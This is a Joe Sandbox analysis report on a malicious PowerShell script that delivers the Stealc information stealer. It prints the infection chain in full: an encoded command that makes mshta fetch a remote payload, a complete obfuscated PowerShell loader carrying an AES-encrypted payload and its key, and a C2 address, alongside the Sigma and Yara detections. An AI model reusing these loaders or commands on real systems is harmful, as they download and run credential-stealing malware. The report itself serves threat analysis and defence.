Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
verification.b-cdn.net.ps1

Overview

General Information

Sample name:verification.b-cdn.net.ps1
Analysis ID:1491044
MD5:4c99ba8c0fcf994162c991b2b6601509
SHA1:4790b36cdbbededed079473ff1c5c34637f2a2f6
SHA256:8d80e5c7d07aef7d4565f4ddc61d3fc5819a5ea68f2d5282e6ae3e5e17d60e3d
Tags:ps1
Infos:

Detection

Go Injector, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Go Injector
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 7172 cmdline: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 7336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 0SmartAssem.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Roaming\0SmartAssem.exe" MD5: 517C4A0A27D1C022A3319AF316407810)
            • BitLockerToGo.exe (PID: 7916 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://193.176.153.234/587ec30955d49a9c.php"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\0SmartAssem.exeJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
        00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
          Process Memory Space: powershell.exe PID: 7336INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x50651:$b1: ::WriteAllBytes(
          • 0x51171:$b1: ::WriteAllBytes(
          • 0x23d19:$s1: -join
          • 0x2461f:$s1: -join
          • 0x4e175:$s1: -join
          • 0x1eb5b:$s4: +=
          • 0x1eb7a:$s4: +=
          • 0x1ebb5:$s4: +=
          • 0x1ebd2:$s4: +=
          • 0x1ec0d:$s4: +=
          • 0x1ec79:$s4: +=
          • 0x1ed05:$s4: +=
          • 0x1ee13:$s4: +=
          • 0x20ade:$s4: +=
          • 0x20b01:$s4: +=
          • 0x259ee:$s4: +=
          • 0x27e8d:$s4: +=
          • 0x27f0c:$s4: +=
          • 0x28127:$s4: +=
          • 0x281aa:$s4: +=
          • 0x28b2b:$s4: +=
          Click to see the 4 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.2.0SmartAssem.exe.7ff74ca60000.8.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
            8.0.0SmartAssem.exe.7ff74ca60000.0.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_7336.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc6e3:$b1: ::WriteAllBytes(
              • 0xc356:$s1: -join
              • 0x5b02:$s4: +=
              • 0x5bc4:$s4: +=
              • 0x9deb:$s4: +=
              • 0xbf08:$s4: +=
              • 0xc1f2:$s4: +=
              • 0xc338:$s4: +=
              • 0x19bb7:$s4: +=
              • 0x19cbb:$s4: +=
              • 0x1d117:$s4: +=
              • 0x1d7f7:$s4: +=
              • 0x1dcad:$s4: +=
              • 0x1dd02:$s4: +=
              • 0x1df76:$s4: +=
              • 0x1dfa5:$s4: +=
              • 0x1e4ed:$s4: +=
              • 0x1e51c:$s4: +=
              • 0x1e5fb:$s4: +=
              • 0x20892:$s4: +=
              • 0x20bf4:$s4: +=

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, CommandLine: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4108, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, ProcessId: 7172, ProcessName: mshta.exe
              Sigma detected: Suspicious MSHTA Child Process
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -spl
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ProcessId: 4108, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ProcessId: 7100, ProcessName: powershell.exe
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7336, TargetFilename: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dll
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ProcessId: 4108, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ProcessId: 7100, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7256, ProcessName: svchost.exe

              Suricata Signatures

              Timestamp:2024-08-10T19:10:37.251997+0200
              SID:2044243
              Severity:1
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-10T19:10:02.529769+0200
              SID:2026434
              Severity:1
              Source Port:443
              Destination Port:49730
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://bidvertiser.b-cdn.net/smart1.zipAvira URL Cloud: Label: malware
              Source: https://bidvertiser.b-cdn.net/smart1Avira URL Cloud: Label: malware
              Source: https://bidvertiser.b-cdn.net/smart1...Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://193.176.153.234/587ec30955d49a9c.php"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]ReversingLabs: Detection: 39%
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]Virustotal: Detection: 28%Perma Link
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeReversingLabs: Detection: 18%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: unknownHTTPS traffic detected: 185.93.1.250:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.93.1.250:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb00 source: Qt5SqlVBox.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSharedClipboard\VBoxSharedClipboard.pdb source: VBoxSharedClipboard.dll.5.dr
              Source: Binary string: dialer.pdbGCTL source: mshta.exe, 00000003.00000002.2371336752.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359272014.0000023769CFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358542351.000002376BED3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2370883950.0000023769CD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2363090899.0000023769D12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BE02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358000601.000002376BED3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362755173.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2361886828.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358786546.000002376BED5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359185745.000002376BED6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358000601.000002376BE3C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366555321.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362119831.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366217044.0000023769D12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2371500355.000002376BE81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362034445.0000023769CC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359137720.000002376BE81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358226135.000002376BEAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359272014.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366801672.000002376BE8D000.00000004.00000020.00020000.00000000.sdmp, smart1[1].3.dr
              Source: Binary string: BitLockerToGo.pdb source: 0SmartAssem.exe, 00000008.00000003.1981482070.0000022BEFA80000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000003.1981404969.0000022BEFD30000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000002.1998133835.000000C0004BB000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5PrintSupportVBox.pdb22 source: Qt5PrintSupportVBox.dll.5.dr
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5PrintSupportVBox.pdb source: Qt5PrintSupportVBox.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSharedFolders\VBoxSharedFolders.pdb source: VBoxSharedFolders.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSupLib\VBoxSupLib.pdb source: VBoxSupLib.dll.5.dr
              Source: Binary string: dialer.pdb source: mshta.exe, 00000003.00000002.2371336752.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BE02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362755173.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2361886828.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366555321.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362119831.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362034445.0000023769CC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359272014.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, smart1[1].3.dr
